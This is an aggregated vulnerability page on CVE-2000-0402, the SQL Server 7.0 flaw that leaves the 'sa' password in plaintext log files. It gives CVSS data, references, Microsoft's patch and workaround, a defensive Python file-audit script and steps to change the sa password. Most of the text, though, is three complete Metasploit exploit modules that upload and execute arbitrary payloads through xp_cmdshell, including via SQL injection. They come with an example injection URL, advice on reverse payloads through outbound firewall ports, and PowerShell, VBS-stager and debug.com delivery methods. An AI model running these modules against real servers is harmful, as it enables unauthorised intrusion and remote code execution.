CVE-2000-0402
CVSS2.1
Published: 2000-05-30 00:00:00
Revised: 2008-09-10 15:04:35

[Original text] The Mixed Mode authentication capability in Microsoft SQL Server 7.0 stores the System Administrator (sa) account in plaintext in a log file which is readable by any user, aka the "SQL Server 7.0 Service Pack Password" vulnerability.


[CNNVD] Microsoft SQL Server 7.0 system administrator password disclosure vulnerability (CNNVD-200005-108)

The Mixed Mode authentication feature in Microsoft SQL Server 7.0 stores the system administrator account in plaintext in a log file that any user can read, also known as the "SQL Server 7.0 Service Pack Password" vulnerability.

- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:microsoft:sql_server:7.0:sp1  Microsoft SQL Server 7.0 Service Pack 1
cpe:/a:microsoft:sql_server:7.0:sp2  Microsoft SQL Server 7.0 Service Pack 2
cpe:/a:microsoft:sql_server:7.0      Microsoft SQL Server 7.0

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0402
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0402
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-108
(official data source) CNNVD

- Other links and resources

http://www.microsoft.com/technet/security/bulletin/ms00-035.asp
(UNKNOWN)  MS  MS00-035
http://www.securityfocus.com/bid/1281
(UNKNOWN)  BID  1281
http://www.microsoft.com/technet/support/kb.asp?ID=263968
(UNKNOWN)  MSKB  Q263968

- Vulnerability information

Microsoft SQL Server 7.0 system administrator password disclosure vulnerability
Low severity  Design error
2000-05-30 00:00:00  2006-09-01 00:00:00
Local
The Mixed Mode authentication feature in Microsoft SQL Server 7.0 stores the system administrator account in plaintext in a log file that any user can read, also known as the "SQL Server 7.0 Service Pack Password" vulnerability.

- Advisories and patches

Microsoft has released a patch for Service Pack 2 and 3 which rectifies this issue. For those running Service Pack 1, search for SQLSP.LOG and SETUP.ISS and delete them. If Service Pack 1 is reinstalled, be sure to delete SQLSP.LOG and SETUP.ISS again, and if Service Pack 2 is re-deployed, apply the patch again.
Microsoft SQL Server 7.0 SP3
Microsoft SQL Server 7.0
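The workaround above has the administrator find and delete SQLSP.LOG and SETUP.ISS by hand. The following added example (not code from Microsoft, the advisory, or this page) automates that check over a server's file tree: it locates those file names, flags lines that look like a stored credential, and can delete the files. The file names come from the advisory; the key names inside the sample files are constructed, since the page does not show the real log format.

```python
"""Locate leftover SQL Server 7.0 SP1 installer files (SQLSP.LOG, SETUP.ISS)
that may hold the 'sa' password in plaintext, report credential-looking
lines, and optionally delete the files as the MS00-035 workaround advises."""
import os
import re
import tempfile
from pathlib import Path

# File names taken from the workaround; matched case-insensitively as on Windows.
LEAKY_FILES = {"sqlsp.log", "setup.iss"}

# Heuristic only: the page does not show the real key names inside these files.
CRED_LINE = re.compile(r"(password|pwd)\s*=", re.IGNORECASE)


def find_leaky_files(root):
    """Return every file under root whose name matches a leaky installer file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        hits.extend(Path(dirpath) / n for n in files if n.lower() in LEAKY_FILES)
    return sorted(hits)


def credential_lines(path):
    """Return (line_no, key) pairs for lines that look like a stored credential."""
    found = []
    with open(path, "r", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            m = CRED_LINE.search(line)
            if m:
                found.append((lineno, m.group(1)))
    return found


def audit(root, remove=False):
    """Report leaky files under root; with remove=True, delete them afterwards."""
    report = []
    for path in find_leaky_files(root):
        report.append({"name": path.name, "credential_lines": credential_lines(path)})
        if remove:
            path.unlink()
    return report


def demo():
    """Audit a constructed sample tree, apply the workaround, then audit again.
    Returns (report_before_removal, report_after_removal)."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "MSSQL7"
        (base / "Install").mkdir(parents=True)
        # Constructed sample contents; the real file format is not on the page.
        (base / "Install" / "SQLSP.LOG").write_text(
            "[SQL Server Service Pack Setup]\nszLogin=sa\n"
            "szPassword=CONSTRUCTED_SAMPLE\nbMixedMode=1\n")
        (base / "SETUP.ISS").write_text("[Application]\nName=SQL Server 7.0 SP1\n")
        (base / "readme.txt").write_text("benign file, nothing sensitive\n")
        before = audit(base, remove=True)
        after = audit(base)
    return before, after


if __name__ == "__main__":
    for entry in demo()[0]:
        print(entry)
```

Point audit() at the SQL Server installation root and any directory the service pack was unpacked into; the report lists each matching file and the line numbers that carried a credential-looking key.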
        

- Vulnerability information (16394)

Microsoft SQL Server Payload Execution via SQL injection (EDBID:16394)
windows remote
2011-02-08 Verified
0 metasploit
##
# $Id: mssql_payload_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::MSSQL_SQLI
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Payload Execution via SQL injection',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft SQL
				Server, using a SQL injection vulnerability.

				Once a vulnerability is identified this module
				will use xp_cmdshell to upload and execute Metasploit payloads.
				It is necessary to specify the exact point where the SQL injection
				vulnerability happens. For example, given the following injection:

				http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical

				you would need to set the following path:
				set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar

				In regard to the payload, unless there is a closed port in the web server,
				you don't want to use any "bind" payload, especially on port 80, as you will
				stop reaching the vulnerable web server host. You want a "reverse" payload, probably to
				your port 80 or to any other outbound port allowed on the firewall.
				For privileged ports execute Metasploit msfconsole as root.

				Currently, three delivery methods are supported.

				First, the original method uses Windows 'debug.com'. File size restrictions are
				avoided by incorporating the debug bypass method presented by SecureStat at
				Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.

				A second method takes advantage of the Command Stager subsystem. This allows using
				various techniques, such as using a TFTP server, to send the executable. By default
				the Command Stager uses 'wscript.exe' to generate the executable on the target.

				Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
				payload on the target.

				NOTE: This module will leave a payload executable on the target system when the
				attack is finished.

			},
			'Author'         =>
				[
					'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',  # original module, debug.exe method, powershell method
					'jduck',  # command stager mods
					'Rodrigo Marcos' # SQL injection mods
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11730 $',
			'References'     =>
				[
					# 'sa' password in logs
					[ 'CVE', '2000-0402' ],
					[ 'OSVDB', '557' ],
					[ 'BID', '1281' ],

					# blank default 'sa' password
					[ 'CVE', '2000-1209' ],
					[ 'OSVDB', '15757' ],
					[ 'BID', '4797' ],

					# code and comments
					[ 'URL', 'http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/' ]

				],
			'Platform'       => 'win',
			'Payload'        =>
				{
					'BadChars' 	=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
				},
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 30 2000'
			))
		register_options(
			[
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('DELIVERY', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'old' ])
			])
	end

	# This method is required for the CmdStager to work...
	def execute_command(cmd, opts)
		mssql_xpcmdshell(cmd, datastore['VERBOSE'])
	end

	def exploit

		method = datastore['DELIVERY'].downcase

		if (method =~ /^cmd/)
			execute_cmdstager({ :linemax => 1500, :nodelete => true })
			#execute_cmdstager({ :linemax => 1500 })
		else
			# Generate the EXE, this is the same no matter what delivery mechanism we use
			exe = generate_payload_exe

			# Use powershell method for payload delivery if specified
			if (method =~ /^ps/) or (method =~ /^power/)
				powershell_upload_exec(exe)
			else
				# Otherwise, fall back to the old way..
				mssql_upload_exec(exe, datastore['VERBOSE'])
			end
		end
		print_status("Almost there, the stager takes a while to execute. Waiting 50 seconds...")
		select(nil,nil,nil,50)
		handler
		disconnect
	end


end

		

- Vulnerability information (16395)

Microsoft SQL Server Payload Execution (EDBID:16395)
windows remote
2010-12-21 Verified
0 metasploit
##
# $Id: mssql_payload.rb 11392 2010-12-21 20:36:34Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::MSSQL
	include Msf::Exploit::CmdStagerVBS
	#include Msf::Exploit::CmdStagerDebugAsm
	#include Msf::Exploit::CmdStagerDebugWrite
	#include Msf::Exploit::CmdStagerTFTP

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Payload Execution',
			'Description'    => %q{
					This module executes an arbitrary payload on a Microsoft SQL Server by using
				the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported.

				First, the original method uses Windows 'debug.com'. File size restrictions are
				avoided by incorporating the debug bypass method presented by SecureStat at
				Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.

				A second method takes advantage of the Command Stager subsystem. This allows using
				various techniques, such as using a TFTP server, to send the executable. By default
				the Command Stager uses 'wscript.exe' to generate the executable on the target.

				Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
				payload on the target.

				NOTE: This module will leave a payload executable on the target system when the
				attack is finished.
			},
			'Author'         =>
				[
					'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',  # original module, debug.exe method, powershell method
					'jduck'  # command stager mods
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11392 $',
			'References'     =>
				[
					# 'sa' password in logs
					[ 'CVE', '2000-0402' ],
					[ 'OSVDB', '557' ],
					[ 'BID', '1281' ],

					# blank default 'sa' password
					[ 'CVE', '2000-1209' ],
					[ 'OSVDB', '15757' ],
					[ 'BID', '4797' ]
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 30 2000'
			))
		register_options(
			[
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('METHOD', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'cmd' ])
			])
	end

	# This method is required for the CmdStager to work...
	def execute_command(cmd, opts)
		mssql_xpcmdshell(cmd, datastore['VERBOSE'])
	end

	def exploit

		if (not mssql_login_datastore)
			print_status("Invalid SQL Server credentials")
			return
		end

		method = datastore['METHOD'].downcase
		
		if (method =~ /^cmd/)
			execute_cmdstager({ :linemax => 1500, :nodelete => true })
			#execute_cmdstager({ :linemax => 1500 })
		else
			# Generate the EXE, this is the same no matter what delivery mechanism we use
			exe = generate_payload_exe

			# Use powershell method for payload delivery if specified
			if (method =~ /^ps/) or (method =~ /^power/)
				powershell_upload_exec(exe)
			else
				# Otherwise, fall back to the old way..
				mssql_upload_exec(exe, datastore['VERBOSE'])
			end
		end

		handler
		disconnect
	end

end
		

- Vulnerability information (F97992)

Microsoft SQL Server Payload Execution via SQL injection (PacketStormID:F97992)
2011-01-29 00:00:00
Rodrigo Marcos,David Kennedy,jduck  metasploit.com
exploit,arbitrary,sql injection
CVE-2000-0402,CVE-2000-1209,OSVDB-15757

This Metasploit module will execute an arbitrary payload on a Microsoft SQL Server, using a SQL injection vulnerability. Once a vulnerability is identified this module will use xp_cmdshell to upload and execute Metasploit payloads. It is necessary to specify the exact point where the SQL injection vulnerability happens.

##
# $Id: mssql_payload.rb 11392 2010-12-21 20:36:34Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::MSSQL_SQLI
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Payload Execution via SQL injection',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft SQL
				Server, using a SQL injection vulnerability.

				Once a vulnerability is identified this module
				will use xp_cmdshell to upload and execute Metasploit payloads.
				It is necessary to specify the exact point where the SQL injection
				vulnerability happens. For example, given the following injection:

				http://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical

				you would need to set the following path:
				set GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar

				In regard to the payload, unless there is a closed port in the web server,
				you don't want to use any "bind" payload, especially on port 80, as you will
				stop reaching the vulnerable web server host. You want a "reverse" payload, probably to
				your port 80 or to any other outbound port allowed on the firewall.
				For privileged ports execute Metasploit msfconsole as root.

				Currently, three delivery methods are supported.

				First, the original method uses Windows 'debug.com'. File size restrictions are
				avoided by incorporating the debug bypass method presented by SecureStat at
				Defcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.

				A second method takes advantage of the Command Stager subsystem. This allows using
				various techniques, such as using a TFTP server, to send the executable. By default
				the Command Stager uses 'wscript.exe' to generate the executable on the target.

				Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
				payload on the target.

				NOTE: This module will leave a payload executable on the target system when the
				attack is finished.

			},
			'Author'         =>
				[
					'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>',  # original module, debug.exe method, powershell method
					'jduck',  # command stager mods
					'Rodrigo Marcos' # SQL injection mods
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11392 $',
			'References'     =>
				[
					# 'sa' password in logs
					[ 'CVE', '2000-0402' ],
					[ 'OSVDB', '557' ],
					[ 'BID', '1281' ],

					# blank default 'sa' password
					[ 'CVE', '2000-1209' ],
					[ 'OSVDB', '15757' ],
					[ 'BID', '4797' ],

					# code and comments
					[ 'URL', 'http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/' ]

				],
			'Platform'       => 'win',
			'Payload'        =>
				{
					'BadChars' 	=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%",
				},
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'May 30 2000'
			))
		register_options(
			[
				OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
				OptString.new('DELIVERY', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'old' ])
			])
	end

	# This method is required for the CmdStager to work...
	def execute_command(cmd, opts)
		mssql_xpcmdshell(cmd, datastore['VERBOSE'])
	end

	def exploit

		method = datastore['DELIVERY'].downcase

		if (method =~ /^cmd/)
			execute_cmdstager({ :linemax => 1500, :nodelete => true })
			#execute_cmdstager({ :linemax => 1500 })
		else
			# Generate the EXE, this is the same no matter what delivery mechanism we use
			exe = generate_payload_exe

			# Use powershell method for payload delivery if specified
			if (method =~ /^ps/) or (method =~ /^power/)
				powershell_upload_exec(exe)
			else
				# Otherwise, fall back to the old way..
				mssql_upload_exec(exe, datastore['VERBOSE'])
			end
		end
		print_status("Almost there, the stager takes a while to execute. Waiting 50 seconds...")
		select(nil,nil,nil,50)
		handler
		disconnect
	end


end

    

- Vulnerability information (F82979)

Microsoft SQL Server Payload Execution (PacketStormID:F82979)
2009-11-26 00:00:00
David Kennedy  metasploit.com
exploit,arbitrary
windows
CVE-2000-0402

This Metasploit module will execute an arbitrary payload on a Microsoft SQL Server, using the Windows debug.com method for writing an executable to disk and the xp_cmdshell stored procedure. File size restrictions are avoided by incorporating the debug bypass method presented at Defcon 17 by SecureState. Note that this module will leave a metasploit payload in the Windows System32 directory which must be manually deleted once the attack is completed.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::MSSQL
	def initialize(info = {})

		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Payload Execution',
			'Description'    => %q{
					This module will execute an arbitrary payload on a Microsoft SQL
				Server, using the Windows debug.com method for writing an executable to disk
				and the xp_cmdshell stored procedure. File size restrictions are avoided by
				incorporating the debug bypass method presented at Defcon 17 by SecureState.
				Note that this module will leave a metasploit payload in the Windows
				System32 directory which must be manually deleted once the attack is completed.
			},
			'Author'         => [ 'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'OSVDB', '557'],
					[ 'CVE', '2000-0402'],
					[ 'BID', '1281'],
					[ 'URL', 'http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf'],
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0 
			))
	end

	def exploit
		
		debug = false # enable to see the output
		
		if(not mssql_login_datastore) 
			print_status("Invalid SQL Server credentials")
			return
		end
		
		mssql_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded), debug)

		handler
		disconnect
	end
end
    

- Vulnerability information

557
MS-SQL Passwordless Admin Account

- Vulnerability description

Microsoft SQL Server versions 7 and 2000, along with Microsoft Data Engine (MSDE), by default installs an admin account ('sa') with a blank or null password. Using this account, it is possible for an intruder to modify and delete information stored in the database and may be able to run commands at the operating system level through the xp_cmdshell stored procedure.

- Timeline

2000-05-30 Unknown
Unknown Unknown

- Solution

Change the password for the 'sa' account, or switch to Domain Authentication mode for this server. To change the 'sa' account password on an MSSQL 7.0 Server, perform the following steps (these steps should be fairly similar on different versions of MSSQL Server):
1. Click Start -> Programs -> Microsoft SQL Server -> Enterprise Manager.
2. Expand 'Console Root' (click on the plus (+) symbol to the left of 'Console Root').
3. Expand 'Microsoft SQL Servers'.
4. Expand 'SQL Server Group'.
5. Double click the name of the affected SQL server.
6. Double click 'Security'.
7. In the right-hand pane, double click on 'Logins'.
8. Right click on 'sa' and select 'Properties'.
9. Click the 'General' tab.
10. Under 'SQL Server Authentication', enter your password of choice and click 'OK'.
11. Enter the password again in the 'Confirm Password' popup window.
12. Exit Enterprise Manager.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's related websites